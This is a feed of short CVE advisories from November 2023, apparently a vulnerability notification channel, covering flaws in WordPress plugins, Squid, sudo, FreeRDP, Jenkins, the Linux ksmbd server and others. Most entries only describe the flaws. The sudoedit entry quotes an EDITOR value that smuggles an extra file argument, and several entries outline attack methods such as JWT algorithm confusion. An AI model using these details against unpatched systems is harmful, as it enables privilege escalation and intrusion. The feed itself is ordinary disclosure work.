🚨 CVE-2023-6100A vulnerability classified as problematic was found in Maiwei Safety Production Control Platform 4.1. This vulnerability affects unknown code of the file /api/DataDictionary/GetItemList. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-245062 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-11-20 16:25:40 |
🚨 CVE-2023-46847Squid is vulnerable to a Denial of Service, where a remote attacker can perform buffer overflow attack by writing up to 2 MB of arbitrary data to heap memory when Squid is configured to accept HTTP Digest Authentication.🎖@cveNotify |
|
| 2023-11-20 14:25:40 |
🚨 CVE-2021-3833Integria IMS login check uses a loose comparator ("==") to compare the MD5 hash of the password provided by the user and the MD5 hash stored in the database. An attacker with a specific formatted password could exploit this vulnerability in order to login in the system with different passwords.🎖@cveNotify |
|
| 2023-11-20 13:55:40 |
🚨 CVE-2023-6103A vulnerability has been found in Intelbras RX 1500 1.1.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /WiFi.html of the component SSID Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-245065 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-11-20 13:25:40 |
🚨 CVE-2023-5669The Featured Image Caption plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode and post meta in all versions up to, and including, 0.8.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-11-20 12:25:47 |
🚨 CVE-2023-6045in OpenHarmony v3.2.2 and prior versions allow a local attacker arbitrary code execution in pre-installed apps through type confusion.🎖@cveNotify |
|
| 2023-11-20 12:25:46 |
🚨 CVE-2023-46705in OpenHarmony v3.2.2 and prior versions allow a local attacker causes system information leak through type confusion.🎖@cveNotify |
|
| 2023-11-20 12:25:41 |
🚨 CVE-2023-43612in OpenHarmony v3.2.2 and prior versions allow a local attacker arbitrary file read and write through improper preservation of permissions.🎖@cveNotify |
|
| 2023-11-20 12:25:40 |
🚨 CVE-2020-8976The integrated server of the ZGR TPS200 NG on its 2.00 firmware version and 1.01 hardware version, allows a remote attacker to perform actions with the permissions of a victim user. For this to happen, the victim user has to have an active session and triggers the malicious request.🎖@cveNotify |
|
| 2023-11-20 11:25:40 |
🚨 CVE-2020-8973ZGR TPS200 NG in its 2.00 firmware version and 1.01 hardware version, does not properly accept specially constructed requests. This allows an attacker with access to the network where the affected asset is located, to operate and change several parameters without having to be registered as a user on the web that owns the device.🎖@cveNotify |
|
| 2023-11-20 10:25:40 |
🚨 CVE-2020-8968Parallels Remote Application Server (RAS) allows a local attacker to retrieve certain profile password in clear text format by uploading a previously stored cyphered file by Parallels RAS. The confidentiality, availability and integrity of the information of the user could be compromised if an attacker is able to recover the profile password.🎖@cveNotify |
|
| 2023-11-20 09:25:40 |
🚨 CVE-2022-46337A cleverly devised username might bypass LDAP authentication checks. In LDAP-authenticated Derby installations, this could let an attacker fill up the disk by creating junk Derby databases. In LDAP-authenticated Derby installations, this could also allow the attacker to execute malware which was visible to and executable by the account which booted the Derby server. In LDAP-protected databases which weren't also protected by SQL GRANT/REVOKE authorization, this vulnerability could also let an attacker view and corrupt sensitive data and run sensitive database functions and procedures.Mitigation:Users should upgrade to Java 21 and Derby 10.17.1.0.Alternatively, users who wish to remain on older Java versions should build their own Derby distribution from one of the release families to which the fix was backported: 10.16, 10.15, and 10.14. Those are the releases which correspond, respectively, with Java LTS versions 17, 11, and 8.🎖@cveNotify |
|
| 2023-11-20 08:25:40 |
🚨 CVE-2023-3379Wago web-based management of multiple products has a vulnerability which allows an local authenticated attacker to change the passwords of other non-admin users and thus to escalate non-root privileges.🎖@cveNotify |
|
| 2023-11-20 03:25:40 |
🚨 CVE-2022-41717An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.🎖@cveNotify |
|
| 2023-11-20 00:25:53 |
🚨 CVE-2023-47685Cross-Site Request Forgery (CSRF) vulnerability in Lukman Nakib Preloader Matrix.This issue affects Preloader Matrix: from n/a through 2.0.1.🎖@cveNotify |
|
| 2023-11-20 00:25:46 |
🚨 CVE-2023-47667Cross-Site Request Forgery (CSRF) vulnerability in Mammothology WP Full Stripe Free.This issue affects WP Full Stripe Free: from n/a through 1.6.1.🎖@cveNotify |
|
| 2023-11-20 00:25:45 |
🚨 CVE-2023-47666Cross-Site Request Forgery (CSRF) vulnerability in Code Snippets Pro Code Snippets.This issue affects Code Snippets: from n/a through 3.5.0.🎖@cveNotify |
|
| 2023-11-20 00:25:41 |
🚨 CVE-2023-48736In International Color Consortium DemoIccMAX 3e7948b, CIccCLUT::Interp2d in IccTagLut.cpp in libSampleICC.a has an out-of-bounds read.🎖@cveNotify |
|
| 2023-11-20 00:25:40 |
🚨 CVE-2023-31102Ppmd7.c in 7-Zip before 23.00 allows an integer underflow and invalid read operation via a crafted 7Z archive.🎖@cveNotify |
|
| 2023-11-19 22:25:40 |
🚨 CVE-2023-44487The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.🎖@cveNotify |
|
| 2023-11-19 15:25:40 |
🚨 CVE-2022-1471SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.🎖@cveNotify |
|
| 2023-11-19 10:25:40 |
🚨 CVE-2023-5341A heap use-after-free flaw was found in coders/bmp.c in ImageMagick.🎖@cveNotify |
|
| 2023-11-18 23:25:47 |
🚨 CVE-2023-41129Cross-Site Request Forgery (CSRF) vulnerability in Patreon Patreon WordPress.This issue affects Patreon WordPress: from n/a through 1.8.6.🎖@cveNotify |
|
| 2023-11-18 23:25:46 |
🚨 CVE-2023-32245Cross-Site Request Forgery (CSRF) vulnerability in WPDeveloper Essential Addons for Elementor Pro.This issue affects Essential Addons for Elementor Pro: from n/a through 5.4.8.🎖@cveNotify |
|
| 2023-11-18 23:25:41 |
🚨 CVE-2023-28780Cross-Site Request Forgery (CSRF) vulnerability in Yoast Yoast Local Premium.This issue affects Yoast Local Premium: from n/a through 14.8.🎖@cveNotify |
|
| 2023-11-18 23:25:40 |
🚨 CVE-2020-22283A buffer overflow vulnerability in the icmp6_send_response_with_addrs_and_netif() function of Free Software Foundation lwIP version git head allows attackers to access sensitive information via a crafted ICMPv6 packet.🎖@cveNotify |
|
| 2023-11-18 22:25:52 |
🚨 CVE-2023-47655Cross-Site Request Forgery (CSRF) vulnerability in Marco Milesi ANAC XML Bandi di Gara.This issue affects ANAC XML Bandi di Gara: from n/a through 7.5.🎖@cveNotify |
|
| 2023-11-18 22:25:51 |
🚨 CVE-2023-47651Cross-Site Request Forgery (CSRF) vulnerability in Robert Macchi WP Links Page.This issue affects WP Links Page: from n/a through 4.9.4.🎖@cveNotify |
|
| 2023-11-18 22:25:47 |
🚨 CVE-2023-47649Cross-Site Request Forgery (CSRF) vulnerability in PriceListo Best Restaurant Menu by PriceListo.This issue affects Best Restaurant Menu by PriceListo: from n/a through 1.3.1.🎖@cveNotify |
|
| 2023-11-18 22:25:46 |
🚨 CVE-2023-47553Cross-Site Request Forgery (CSRF) vulnerability in User Local Inc UserHeat Plugin.This issue affects UserHeat Plugin: from n/a through 1.1.6.🎖@cveNotify |
|
| 2023-11-18 22:25:41 |
🚨 CVE-2023-47551Cross-Site Request Forgery (CSRF) vulnerability in RedNao Donations Made Easy – Smart Donations.This issue affects Donations Made Easy – Smart Donations: from n/a through 4.0.12.🎖@cveNotify |
|
| 2023-11-18 22:25:40 |
🚨 CVE-2023-47243Cross-Site Request Forgery (CSRF) vulnerability in CodeMShop 코드엠샵 마이사이트 – MSHOP MY SITE.This issue affects 코드엠샵 마이사이트 – MSHOP MY SITE: from n/a through 1.1.6.🎖@cveNotify |
|
| 2023-11-18 21:25:47 |
🚨 CVE-2023-47685Cross-Site Request Forgery (CSRF) vulnerability in Lukman Nakib Preloader Matrix.This issue affects Preloader Matrix: from n/a through 2.0.1.🎖@cveNotify |
|
| 2023-11-18 21:25:46 |
🚨 CVE-2023-47670Cross-Site Request Forgery (CSRF) vulnerability in Jongmyoung Kim Korea SNS.This issue affects Korea SNS: from n/a through 1.6.3.🎖@cveNotify |
|
| 2023-11-18 21:25:41 |
🚨 CVE-2023-47666Cross-Site Request Forgery (CSRF) vulnerability in Code Snippets Pro Code Snippets.This issue affects Code Snippets: from n/a through 3.5.0.🎖@cveNotify |
|
| 2023-11-18 21:25:40 |
🚨 CVE-2023-34462Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final.🎖@cveNotify |
|
| 2023-11-18 19:25:40 |
🚨 CVE-2023-48736In International Color Consortium DemoIccMAX 3e7948b, CIccCLUT::Interp2d in IccTagLut.cpp in libSampleICC.a has an out-of-bounds read.🎖@cveNotify |
|
| 2023-11-18 18:25:40 |
🚨 CVE-2023-38361IBM CICS TX Advanced 10.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 260770.🎖@cveNotify |
|
| 2023-11-18 11:25:40 |
🚨 CVE-2023-4237A flaw was found in the Ansible Automation Platform. When creating a new keypair, the ec2_key module prints out the private key directly to the standard output. This flaw allows an attacker to fetch those keys from the log files, compromising the system's confidentiality, integrity, and availability.🎖@cveNotify |
|
| 2023-11-18 04:25:53 |
🚨 CVE-2023-48017Dreamer_cms 4.1.3 is vulnerable to Cross Site Request Forgery (CSRF) via Add permissions to CSRF in Permission Management.🎖@cveNotify |
|
| 2023-11-18 04:25:46 |
🚨 CVE-2023-43177CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.🎖@cveNotify |
|
| 2023-11-18 04:25:45 |
🚨 CVE-2023-48294LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems. In affected versions of LibreNMS when a user accesses their device dashboard, one request is sent to `graph.php` to access graphs generated on the particular Device. This request can be accessed by a low privilege user and they can enumerate devices on librenms with their id or hostname. Leveraging this vulnerability a low privilege user can see all devices registered by admin users. This vulnerability has been addressed in commit `489978a923` which has been included in release version 23.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-11-18 04:25:41 |
🚨 CVE-2023-46745LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems. In affected versions the login method has no rate limit. An attacker may be able to leverage this vulnerability to gain access to user accounts. This issue has been addressed in version 23.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-11-18 04:25:40 |
🚨 CVE-2023-48185Directory Traversal vulnerability in TerraMaster v.s1.0 through v.2.295 allows a remote attacker to obtain sensitive information via a crafted GET request.🎖@cveNotify |
|
| 2023-11-18 03:55:46 |
🚨 CVE-2023-45585An insertion of sensitive information into log file vulnerability [CWE-532] in FortiSIEM version 7.0.0, version 6.7.6 and below, version 6.6.3 and below, version 6.5.1 and below, version 6.4.2 and below, version 6.3.3 and below, version 6.2.1 and below, version 6.1.2 and below, version 5.4.0, version 5.3.3 and below may allow an authenticated user to view an encrypted ElasticSearch password via debug log files generated when FortiSIEM is configured with ElasticSearch Event Storage.🎖@cveNotify |
|
| 2023-11-18 03:55:41 |
🚨 CVE-2023-42783A relative path traversal in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 and 8.4.2 through 8.4.0 and 8.3.2 through 8.3.0 and 8.2.2 allows attacker to read arbitrary files via crafted http requests.🎖@cveNotify |
|
| 2023-11-18 03:55:40 |
🚨 CVE-2023-46446An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation.🎖@cveNotify |
|
| 2023-11-18 03:25:58 |
🚨 CVE-2023-6073Attacker can perform a Denial of Service attack to crash the ICAS 3 IVI ECU in a Volkswagen ID.3 (and other vehicles of the VW Group with the same hardware) and spoof volume setting commands to irreversibly turn on audio volume to maximum via REST API calls.🎖@cveNotify |
|
| 2023-11-18 03:25:57 |
🚨 CVE-2023-5380A use-after-free flaw was found in the xorg-x11-server. An X server crash may occur in a very specific and legacy configuration (a multi-screen setup with multiple protocol screens, also known as Zaphod mode) if the pointer is warped from within a window on one screen to the root window of the other screen and if the original window is destroyed followed by another window being destroyed.🎖@cveNotify |
|
| 2023-11-18 03:25:53 |
🚨 CVE-2023-39325A malicious HTTP/2 client which rapidly creates requests and immediately resets them can cause excessive server resource consumption. While the total number of requests is bounded by the http2.Server.MaxConcurrentStreams setting, resetting an in-progress request allows the attacker to create a new request while the existing one is still executing. With the fix applied, HTTP/2 servers now bound the number of simultaneously executing handler goroutines to the stream concurrency limit (MaxConcurrentStreams). New requests arriving when at the limit (which can only happen after the client has reset an existing, in-flight request) will be queued until a handler exits. If the request queue grows too large, the server will terminate the connection. This issue is also fixed in golang.org/x/net/http2 for users manually configuring HTTP/2. The default stream concurrency limit is 250 streams (requests) per HTTP/2 connection. This value may be adjusted using the golang.org/x/net/http2 package; see the Server.MaxConcurrentStreams setting and the ConfigureServer function.🎖@cveNotify |
|
| 2023-11-18 03:25:52 |
🚨 CVE-2014-125102A vulnerability classified as problematic was found in Bestwebsoft Relevant Plugin up to 1.0.7 on WordPress. Affected by this vulnerability is an unknown functionality of the component Thumbnail Handler. The manipulation leads to information disclosure. The attack can be launched remotely. Upgrading to version 1.0.8 is able to address this issue. The identifier of the patch is 860d1891025548cf0f5f97364c1f51a888f523c3. It is recommended to upgrade the affected component. The identifier VDB-230113 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-11-18 03:25:47 |
🚨 CVE-2014-125092A vulnerability was found in MaxButtons Plugin up to 1.26.0 on WordPress and classified as problematic. This issue affects the function maxbuttons_strip_px of the file includes/maxbuttons-button.php. The manipulation of the argument button_id leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 1.26.1 is able to address this issue. The patch is named e74564c9e3b7429808e317f4916bd1c26ef0b806. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-222323.🎖@cveNotify |
|
| 2023-11-18 03:25:46 |
🚨 CVE-2014-125089A vulnerability was found in cention-chatserver 3.8.0-rc1. It has been declared as problematic. Affected by this vulnerability is the function _formatBody of the file lib/InternalChatProtocol.fe. The manipulation of the argument body leads to cross site scripting. The attack can be launched remotely. Upgrading to version 3.9 is able to address this issue. The identifier of the patch is c4c0258bbd18f6915f97f91d5fee625384096a26. It is recommended to upgrade the affected component. The identifier VDB-221497 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-11-18 03:25:41 |
🚨 CVE-2020-36642A vulnerability was found in trampgeek jobe up to 1.6.x and classified as critical. This issue affects the function run_in_sandbox of the file application/libraries/LanguageTask.php. The manipulation leads to command injection. Upgrading to version 1.7.0 is able to address this issue. The identifier of the patch is 8f43daf50c943b98eaf0c542da901a4a16e85b02. It is recommended to upgrade the affected component. The identifier VDB-217553 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-11-18 03:25:40 |
🚨 CVE-2021-39077IBM Security Guardium 10.5, 10.6, 11.0, 11.1, 11.2, 11.3, and 11.4 stores user credentials in plain clear text which can be read by a local privileged user. IBM X-Force ID: 215587.?🎖@cveNotify |
|
| 2023-11-18 02:25:40 |
🚨 CVE-2023-48017Dreamer_cms 4.1.3 is vulnerable to Cross Site Request Forgery (CSRF) via Add permissions to CSRF in Permission Management.🎖@cveNotify |
|
| 2023-11-18 00:55:40 |
🚨 CVE-2023-41138The AppsAnywhere macOS client-privileged helper can be tricked into executing arbitrary commands with elevated permissions by a local user process.🎖@cveNotify |
|
| 2023-11-18 00:25:40 |
🚨 CVE-2023-41137Symmetric encryption used to protect messages between the AppsAnywhere server and client can be broken by reverse engineering the client and used to impersonate the AppsAnywhere server.🎖@cveNotify |
|
| 2023-11-17 23:55:41 |
🚨 CVE-2023-28379A memory corruption vulnerability exists in the HTTP Server form boundary functionality of Weston Embedded uC-HTTP v3.01.01. A specially crafted network packet can lead to code execution. An attacker can send a malicious packet to trigger this vulnerability.🎖@cveNotify |
|
| 2023-11-17 23:55:40 |
🚨 CVE-2023-46854Proxmox proxmox-widget-toolkit before 4.0.9, as used in multiple Proxmox products, allows XSS via the edit notes feature.🎖@cveNotify |
|
| 2023-11-17 23:25:40 |
🚨 CVE-2019-11069Sequelize version 5 before 5.3.0 does not properly ensure that standard conforming strings are used.🎖@cveNotify |
|
| 2023-11-17 22:25:46 |
🚨 CVE-2023-48238joaquimserafim/json-web-token is a javascript library use to interact with JSON Web Tokens (JWT) which are a compact URL-safe means of representing claims to be transferred between two parties. Affected versions of the json-web-token library are vulnerable to a JWT algorithm confusion attack. On line 86 of the 'index.js' file, the algorithm to use for verifying the signature of the JWT token is taken from the JWT token, which at that point is still unverified and thus shouldn't be trusted. To exploit this vulnerability, an attacker needs to craft a malicious JWT token containing the HS256 algorithm, signed with the public RSA key of the victim application. This attack will only work against this library is the RS256 algorithm is in use, however it is a best practice to use that algorithm.🎖@cveNotify |
|
| 2023-11-17 22:25:41 |
🚨 CVE-2023-43902Incorrect access control in the Forgot Your Password function of EMSigner v2.8.7 allows unauthenticated attackers to access accounts of all registered users, including those with administrator privileges via a crafted password reset token.🎖@cveNotify |
|
| 2023-11-17 22:25:40 |
🚨 CVE-2018-1000807Python Cryptographic Authority pyopenssl version prior to version 17.5.0 contains a CWE-416: Use After Free vulnerability in X509 object handling that can result in Use after free can lead to possible denial of service or remote code execution.. This attack appear to be exploitable via Depends on the calling application and if it retains a reference to the memory.. This vulnerability appears to have been fixed in 17.5.0.🎖@cveNotify |
|
| 2023-11-17 21:55:41 |
🚨 CVE-2023-31219Server-Side Request Forgery (SSRF) vulnerability in WPChill Download Monitor.This issue affects Download Monitor: from n/a through 4.8.1.🎖@cveNotify |
|
| 2023-11-17 21:55:40 |
🚨 CVE-2023-47390Headscale through 0.22.3 writes bearer tokens to info-level logs.🎖@cveNotify |
|
| 2023-11-17 21:25:40 |
🚨 CVE-2023-48295LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems. Affected versions are subject to a cross site scripting (XSS) vulnerability in the device group popups. This issue has been addressed in commit `faf66035ea` which has been included in release version 23.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-11-17 20:55:41 |
🚨 CVE-2023-47120Discourse is an open source platform for community discussion. In versions 3.1.0 through 3.1.2 of the `stable` branch and versions 3.1.0,beta6 through 3.2.0.beta2 of the `beta` and `tests-passed` branches, Redis memory can be depleted by crafting a site with an abnormally long favicon URL and drafting multiple posts which Onebox it. The issue is patched in version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches. There are no known workarounds.🎖@cveNotify |
|
| 2023-11-17 19:55:41 |
🚨 CVE-2023-34241OpenPrinting CUPS is a standards-based, open source printing system for Linux and other Unix-like operating systems. Starting in version 2.0.0 and prior to version 2.4.6, CUPS logs data of free memory to the logging service AFTER the connection has been closed, when it should have logged the data right before. This is a use-after-free bug that impacts the entire cupsd process.The exact cause of this issue is the function `httpClose(con->http)` being called in `scheduler/client.c`. The problem is that httpClose always, provided its argument is not null, frees the pointer at the end of the call, only for cupsdLogClient to pass the pointer to httpGetHostname. This issue happens in function `cupsdAcceptClient` if LogLevel is warn or higher and in two scenarios: there is a double-lookup for the IP Address (HostNameLookups Double is set in `cupsd.conf`) which fails to resolve, or if CUPS is compiled with TCP wrappers and the connection is refused by rules from `/etc/hosts.allow` and `/etc/hosts.deny`.Version 2.4.6 has a patch for this issue.🎖@cveNotify |
|
| 2023-11-17 19:55:40 |
🚨 CVE-2023-22809In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value.🎖@cveNotify |
|
| 2023-11-17 19:25:49 |
🚨 CVE-2022-39316FreeRDP is a free remote desktop protocol library and clients. In affected versions there is an out of bound read in ZGFX decoder component of FreeRDP. A malicious server can trick a FreeRDP based client to read out of bound data and try to decode it likely resulting in a crash. This issue has been addressed in the 2.9.0 release. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-11-17 19:25:42 |
🚨 CVE-2022-39283FreeRDP is a free remote desktop protocol library and clients. All FreeRDP based clients when using the `/video` command line switch might read uninitialized data, decode it as audio/video and display the result. FreeRDP based server implementations are not affected. This issue has been patched in version 2.8.1. If you cannot upgrade do not use the `/video` switch.🎖@cveNotify |
|
| 2023-11-17 19:25:41 |
🚨 CVE-2021-41160FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions a malicious server might trigger out of bound writes in a connected client. Connections using GDI or SurfaceCommands to send graphics updates to the client might send `0` width/height or out of bound rectangles to trigger out of bound writes. With `0` width or heigth the memory allocation will be `0` but the missing bounds checks allow writing to the pointer at this (not allocated) region. This issue has been patched in FreeRDP 2.4.1.🎖@cveNotify |
|
| 2023-11-17 18:55:42 |
🚨 CVE-2023-32258A flaw was found in the Linux kernel's ksmbd, a high-performance in-kernel SMB server. The specific flaw exists within the processing of SMB2_LOGOFF and SMB2_CLOSE commands. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to execute code in the context of the kernel.🎖@cveNotify |
|
| 2023-11-17 18:55:41 |
🚨 CVE-2023-38427An issue was discovered in the Linux kernel before 6.3.8. fs/smb/server/smb2pdu.c in ksmbd has an integer underflow and out-of-bounds read in deassemble_neg_contexts.🎖@cveNotify |
|
| 2023-11-17 18:25:50 |
🚨 CVE-2023-31247A memory corruption vulnerability exists in the HTTP Server Host header parsing functionality of Weston Embedded uC-HTTP v3.01.01. A specially crafted network packet can lead to code execution. An attacker can send a malicious packet to trigger this vulnerability.🎖@cveNotify |
|
| 2023-11-17 18:25:44 |
🚨 CVE-2023-45880GibbonEdu Gibbon through version 25.0.0 allows Directory Traversal via the report template builder. An attacker can create a new Asset Component. The templateFileDestination parameter can be set to an arbitrary pathname (and extension). This allows creation of PHP files outside of the uploads directory, directly in the webroot.🎖@cveNotify |
|
| 2023-11-17 18:25:43 |
🚨 CVE-2018-8863The HTTP header in Philips EncoreAnywhere contains data an attacker may be able to use to gain sensitive information.🎖@cveNotify |
|
| 2023-11-17 18:25:42 |
🚨 CVE-2023-30586A privilege escalation vulnerability exists in Node.js 20 that allowed loading arbitrary OpenSSL engines when the experimental permission model is enabled, which can bypass and/or disable the permission model. The attack complexity is high. However, the crypto.setEngine() API can be used to bypass the permission model when called with a compatible OpenSSL engine. The OpenSSL engine can, for example, disable the permission model in the host process by manipulating the process's stack memory to locate the permission model Permission::enabled_ in the host process's heap memory. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2023-11-17 17:55:48 |
🚨 CVE-2022-41115Microsoft Edge (Chromium-based) Update Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-11-17 17:55:41 |
🚨 CVE-2022-28143A cross-site request forgery (CSRF) vulnerability in Jenkins Proxmox Plugin 0.7.0 and earlier allows attackers to connect to an attacker-specified host using attacker-specified username and password (perform a connection test), disable SSL/TLS validation for the entire Jenkins controller JVM as part of the connection test (see CVE-2022-28142), and test a rollback with attacker-specified parameters.🎖@cveNotify |
|
| 2023-11-17 17:55:40 |
🚨 CVE-2022-28141Jenkins Proxmox Plugin 0.5.0 and earlier stores the Proxmox Datacenter password unencrypted in the global config.xml file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system.🎖@cveNotify |
|
| 2023-11-17 17:25:48 |
🚨 CVE-2022-28146Jenkins Continuous Integration with Toad Edge Plugin 2.3 and earlier allows attackers with Item/Configure permission to read arbitrary files on the Jenkins controller by specifying an input folder on the Jenkins controller as a parameter to its build steps.🎖@cveNotify |
|
| 2023-11-17 17:25:41 |
🚨 CVE-2022-28140Jenkins Flaky Test Handler Plugin 1.2.1 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.🎖@cveNotify |
|
| 2023-11-17 17:25:40 |
🚨 CVE-2022-28138A cross-site request forgery (CSRF) vulnerability in Jenkins RocketChat Notifier Plugin 1.4.10 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credential.🎖@cveNotify |
|
| 2023-11-17 16:55:46 |
🚨 CVE-2023-6054A vulnerability, which was classified as critical, was found in Tongda OA 2017 up to 11.9. This affects an unknown part of the file general/wiki/cp/manage/lock.php. The manipulation of the argument TERM_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-244875. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-11-17 16:55:41 |
🚨 CVE-2023-45283The filepath package does not recognize paths with a \??\ prefix as special. On Windows, a path beginning with \??\ is a Root Local Device path equivalent to a path beginning with \\?\. Paths with a \??\ prefix may be used to access arbitrary locations on the system. For example, the path \??\c:\x is equivalent to the more common path c:\x. Before fix, Clean could convert a rooted path such as \a\..\??\b into the root local device path \??\b. Clean will now convert this to .\??\b. Similarly, Join(\, ??, b) could convert a seemingly innocent sequence of path elements into the root local device path \??\b. Join will now convert this to \.\??\b. In addition, with fix, IsAbs now correctly reports paths beginning with \??\ as absolute, and VolumeName correctly reports the \??\ prefix as a volume name.🎖@cveNotify |
|
| 2023-11-17 16:55:40 |
🚨 CVE-2023-40054The Network Configuration Manager was susceptible to a Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows a low-level user to perform the actions with SYSTEM privileges. We found this issue was not resolved in CVE-2023-33226🎖@cveNotify |
|
| 2023-11-17 16:25:41 |
🚨 CVE-2023-45560An issue in Yasukawa memberscard v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2023-11-17 16:25:40 |
🚨 CVE-2023-4603The Star CloudPRNT for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'printersettings' parameter in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-11-17 15:25:41 |
🚨 CVE-2023-31754Optimizely CMS UI before v12.16.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Admin panel.🎖@cveNotify |
|
| 2023-11-17 15:25:40 |
🚨 CVE-2023-37580Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.🎖@cveNotify |
|
| 2023-11-17 14:55:40 |
🚨 CVE-2023-47365The leakage of channel access token in Lil.OFF-PRICE STORE Line 13.6.1 allows remote attackers to send malicious notifications to victims.🎖@cveNotify |
|
| 2023-11-17 14:25:41 |
🚨 CVE-2023-5741The POWR plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'powr-powr-pack' shortcode in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-11-17 14:25:40 |
🚨 CVE-2023-47363The leakage of channel access token in F.B.P members Line 13.6.1 allows remote attackers to send malicious notifications to victims.🎖@cveNotify |
|
| 2023-11-17 13:55:41 |
🚨 CVE-2023-46092Cross-Site Request Forgery (CSRF) vulnerability in LionScripts.Com Webmaster Tools allows Stored XSS.This issue affects Webmaster Tools: from n/a through 2.0.🎖@cveNotify |
|
| 2023-11-17 13:55:40 |
🚨 CVE-2023-38363IBM CICS TX Advanced 10.1 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 260818.🎖@cveNotify |
|
| 2023-11-17 13:25:53 |
🚨 CVE-2023-44324Adobe FrameMaker versions 2022 and earlier are affected by an Improper Authentication vulnerability that could result in a Security feature bypass. An unauthenticated attacker can abuse this vulnerability to access the API and leak default admin's password. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-11-17 13:25:46 |
🚨 CVE-2023-22273Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to Remote Code Execution by an admin authenticated attacker. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-11-17 13:25:45 |
